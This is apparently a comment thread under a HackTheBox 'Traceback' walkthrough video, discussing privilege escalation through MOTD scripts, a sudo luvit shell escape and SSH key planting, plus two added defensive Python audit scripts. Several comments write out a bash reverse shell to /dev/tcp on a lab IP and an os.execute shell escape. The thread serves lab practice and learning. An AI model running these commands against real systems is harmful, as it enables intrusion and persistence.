31:00 "oh we're grepping for cron, that expl... doesn't explain it" lolol I love these videos, it shows exactly how the process goes and I can't get enough.
Love green Linux boxes, this type is the only one where beginners can have fun
❤️
More like a medium I would say
Heh, even experienced users only find the fun in easy boxes 😅
Hey IppSec, thank you for the informative videos. It was my first ever rooted live box on HTB and after watching your video I have realised how valuable the experience is. Thank you.
Was looking forward to this because for some reason I had such a hard time getting a reverse shell back from editing the MOTD, eventually had to just settle for echoing the root flag. I'm not exactly sure why, but maybe it's because I didn't do "bash -i" and instead just did the bash reverse shell by itself. Fun box and thanks for the video!
Also had some trouble with that. What I ended up doing was writing my ssh key to root's authorized_keys and SSHing in. I only thought of doing so in my second time around, when I was preparing for my writeup, though :D
@GamerMeiogordo Ah, that makes sense. I had used the smevk.php file in order to drop an authorized key, but for the lower user; should've attempted that for root. Thanks for the tip!
So much to learn from this video. Thank you IppSec!
Learned a lot with SSH keys and lua scripting :)
Thank you IppSec you always help me learn something new.
Thank you for taking the time to do the walk through!
great walkthrough! thanks for explaining your thinking process.
Hey Ippsec. Nice to be second commenting on your video. Again great work as usual.
Always legendary!! 🔥❤️
You know the feeling when you watch IppSec videos just because you are sad?
It's weird.
However, it just happened to me.
Hope you're doing okay, my friend💜
Excellent walk-through !
FYI: Lua is also used to handle the game logic in a lot of computer games.
Lua is basically the entire base of every World of Warcraft addon and every Garry's Mod hack :D
Hey ippsec, i was wondering is there a chance we can get your parrot system mount to download? Great content as always, much love.
github.com/theGuildHall/pwnbox Here is a guide to set it up
Here I found this ! Its not his but similar to HTB's pwnbox github.com/theGuildHall/pwnbox
@duckie4670 i tried :'D
@evildead7845 thanks buddy
❤❤
what do the -c and -i commands do at 6:19 ?
/dev/tcp/ is a weird bash thing; sometimes webservers will use less-featured shells like sh/ash/etc. to launch the process. So having bash -c means to use bash to execute the next command (makes sure you have /dev/tcp). The -i just means interactive and is needed for the revshell.
@ippsec I see, thanks
-c means command, -i means interactive. That command tells bash to execute an interactive bash shell.
Maybe I missed something but your statement: "The box has been hacked and people have hired you to do some sort of incident response...". Where on HTB do you get this theme info?
Just an assumption based upon the webshell being there. Combine that with the name trace, it seems like that’s the scenario it’s going for.
Why does IppSec go from looking at /var/backups/.update... to looking at cron-related things? A quick Google of .update-motd.d doesn't give any cron-related hints either. Is this just system knowledge stuff, or did IppSec have an idea of looking at cron after seeing this content?
@22:00 learned a new command: stat! Thanks @ippsec
Damn, you are good, new sub!
When I tried a reverse shell on the MOTD scripts they weren't working. Was this due to the bash -c 'bash -i' trick? Alternatively I just used the script to write to /root/.ssh/authorized_keys, so that worked as well
I was thinking about this. It seems like since the Lua script runs as root, you can just write to the root SSH key and skip the user flag. Not sure though @ippsec
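Added example (not part of the thread or the video): a Python check a defender could run against the MOTD scripts discussed here. It compares each live script in update-motd.d with the backup copy the thread mentions and flags write bits and ownership; the directory layout and the fixture in demo() are constructed.

```python
"""Added example (not IppSec's code): integrity check for the update-motd.d
scripts discussed above. They run as root at every SSH login; the thread
mentions a backup copy under /var/backups, so each live script is compared
with its backup by SHA-256 and checked for non-root ownership or group/world
write bits. The fixture in demo() is constructed."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def _sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def audit_motd_scripts(live_dir, backup_dir, expected_uid=0):
    """Return sorted (script, finding) pairs; an empty list means clean."""
    findings = []
    live, backup = Path(live_dir), Path(backup_dir)
    for script in sorted(p for p in live.iterdir() if p.is_file()):
        st = script.stat()  # same fields stat(1) prints at 22:00 in the video
        # Anyone who can write a script here gets code execution as root.
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((script.name, "group/world writable"))
        if st.st_uid != expected_uid:
            findings.append((script.name, f"owned by uid {st.st_uid}"))
        ref = backup / script.name
        if not ref.is_file():
            findings.append((script.name, "no pristine copy in backup"))
        elif _sha256(ref) != _sha256(script):
            findings.append((script.name, "content differs from backup"))
    return findings


def demo():
    """Constructed fixture: one tampered script and one world-writable script."""
    root = Path(tempfile.mkdtemp())
    live, backup = root / "update-motd.d", root / "backup"
    header = "#!/bin/sh\n[ -r /etc/lsb-release ] && . /etc/lsb-release\n"
    for d in (live, backup):
        d.mkdir()
        (d / "00-header").write_text(header)
        (d / "10-help-text").write_text("#!/bin/sh\nprintf 'Welcome\\n'\n")
    # Simulate tampering: an extra line appended to the live 00-header only.
    (live / "00-header").write_text(header + "echo tampered\n")
    os.chmod(live / "00-header", 0o644)
    os.chmod(live / "10-help-text", 0o666)
    # Audit as the current user; on a real host leave expected_uid at 0 (root).
    return audit_motd_scripts(live, backup, expected_uid=os.getuid())
```

Running demo() reports the modified header and the loose permissions on the help-text script, the two conditions that made the MOTD path on this box possible.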
i love your videos
What other options are there for the .lua script you could write? Could you just write a reverse shell in .lua?
Pretty sure he could've just read /etc/shadow and /etc/passwd and thrown them at John, or, even more directly, just read root.txt (since he can sudo without a password, if he writes a script that reads those files I think it's possible to simply read all those files with escalated privileges)
@ralesarcevic Or I suppose he could've written to /etc/passwd?
The user does not have root privs, so he could not have done that. I could have just done something like os.execute() for a revshell, but SSH keys are more stable and also give persistence.
You can also just check gtfo bins for lua related stuff. Some good alternatives. Like @ippsec said though, ssh key is going to be the most stable provided that it's open and accepting no-pass logins.
@ippsec My bad, seems like my understanding of having (NOPASSWD) on a binary in sudoers is bad, aka it doesn't mean you can get root privileges via executing said binary unless the runas user is root; you only gain the privileges of that user.
Great tutorial... btw, in order to privesc you could have used
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/sh")'
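Added example (not from the video or any commenter): a small sudoers audit that makes the point settled above concrete. A (sysadmin) NOPASSWD rule on an interpreter such as luvit hands out sysadmin's privileges, not root's, so the audit records the runas user separately from whether the binary has a known shell escape; the sample rules and the webuser/logreader names are constructed.

```python
"""Added example (not from the video or any commenter): a sudoers rule audit
for the point made above, that (sysadmin) NOPASSWD on an interpreter such as
luvit grants sysadmin's privileges, not root's. Sample rules are constructed."""
import re
from typing import List, NamedTuple

# Binaries with documented shell escapes (GTFOBins); constructed, not exhaustive.
SHELL_CAPABLE = {"ALL", "lua", "luvit", "python", "python3", "perl", "ruby",
                 "vim", "vi", "less", "more", "find", "awk", "bash", "sh"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"   # optional (runas_user:runas_group)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"      # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+)$")

class Finding(NamedTuple):
    user: str
    runas: str
    command: str
    nopasswd: bool
    root_equivalent: bool  # runs as root (or ALL), not merely another user
    shell_escape: bool     # binary can drop to a shell as the runas user

def audit_sudoers(text: str) -> List[Finding]:
    """Parse user/%group rules; Defaults and alias definitions are skipped."""
    out = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # No (runas) clause, or a group-only (:grp) clause, means "as root".
        runas = (m.group("runas") or "").split(":")[0].strip() or "root"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            out.append(Finding(m.group("user"), runas, cmd, nopasswd,
                               runas in ("root", "ALL"), binary in SHELL_CAPABLE))
    return out

SAMPLE_SUDOERS = """\
Defaults env_reset
root      ALL=(ALL:ALL) ALL
%sudo     ALL=(ALL:ALL) ALL
webuser   ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
logreader ALL=(root) NOPASSWD: /bin/cat /var/log/syslog
"""
```

For the luvit rule the audit returns root_equivalent=False but shell_escape=True, which is exactly the lateral move to sysadmin the thread describes; the cat rule is the opposite case.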
nice zsh theme
-sC -sV can be combined with -sCV
thx
Would scripts like LinPEASS/PowerUp ever be used in a real life situation? They always seemed pretty noisy to me, but I was interested to know if they're useful
Isn't your channel monetized? Should I be investing time on youtube for walkthrough videos?
lol I doubt it, relying on views is a bad business model for technical/long-format creators, start using a subscription service like subscribe star and/or crypto-wallets in all the common currencies for donations. Many channels do this as it promotes quality over quantity and you won't be beholden to anyone/ creating clickbait filler content.
Really confusing playing HTB, how do you guys know when to google, nmap, view source, and how to choose a fuzz wordlist?
experience, and intuition
Hi, thank you for the video, I have a question, why did you use :
bash -c 'bash -i >& /dev/tcp/10.10.10.10/3333 9>&1'
and not directly
bash -i >& /dev/tcp/10.10.10.10/3333 9>&1
In some cases that will not work.
IppSec, by any chance do you have a lab or walkthrough of recovering data on TrueCrypt hidden volumes? I've been working lately trying to recover a backup; perhaps in your experience you've run through this and can give me a nudge. Thanks
What is the source of your SecList? Is it available on GitHub?
apt install seclists
Source: github.com/danielmiessler/SecLists
Hello, beginner here and I could use some help. After I run nmap -sC -sV -oA nmap/traceback 10.10.10.181 and get the output, I try to follow along and use the cd /opt/SecLists/ and cd Discovery/ commands, but all I get back is "The specified path does not exist" messages. I don't really see what I could have done wrong since I was following the vid; any advice would be greatly appreciated!
These files are from GitHub and do not come with your standard OS installation (I'm assuming you're using Kali Linux instead of Parrot). IppSec has already downloaded them to the machine in this video. If you search GitHub for "SecLists" (github.com/danielmiessler/SecLists) you can download these to your machine using git clone and continue from there.
Is this a retired machine?
It seems to me, that you did this vid in a hurry :)
Would like to know your tmux configuration
Very nice ❤💗. I have to send more money. So good, I have to.
Creative ?
Btw you can also host a SimpleHTTPServer with python -m SimpleHTTPServer instead of running an Apache server to push files to the target. I find the python method way simpler and faster.
Could anyone explain this in brief... like, what is this?
What's this called?
How can you learn it?
Thanks
This box/browser-based machine is available on www.hackthebox.eu. Basically it is a website which provides you with many machines on which you can practice your hacking skills or prepare for the OSCP certification; the machines given in that certification are likely to be like this.
If you are a beginner and want to learn this, then I would recommend you first visit tryhackme.com. It is the best place to start: there you will be guided on which machines you should complete first, and it also contains various walkthroughs which can guide you better. When you gain a little confidence that you know what you have to do, then you can move on to this site.
Make sure to keep and maintain notes on every machine you work on; it will help you in future if you prepare for OSCP.
I hope this clears your doubt.
I had a lot of fun with this box. Neat idea appending to authorized_keys; I ended up using GTFOBins to spawn a shell as sysadmin.
gtfobins.github.io/gtfobins/lua/#shell
just btw: wget -O -
Lua is pronounced loo-er
He says "loo-er" at 14:18. You actually think he doesn't know how to pronounce it?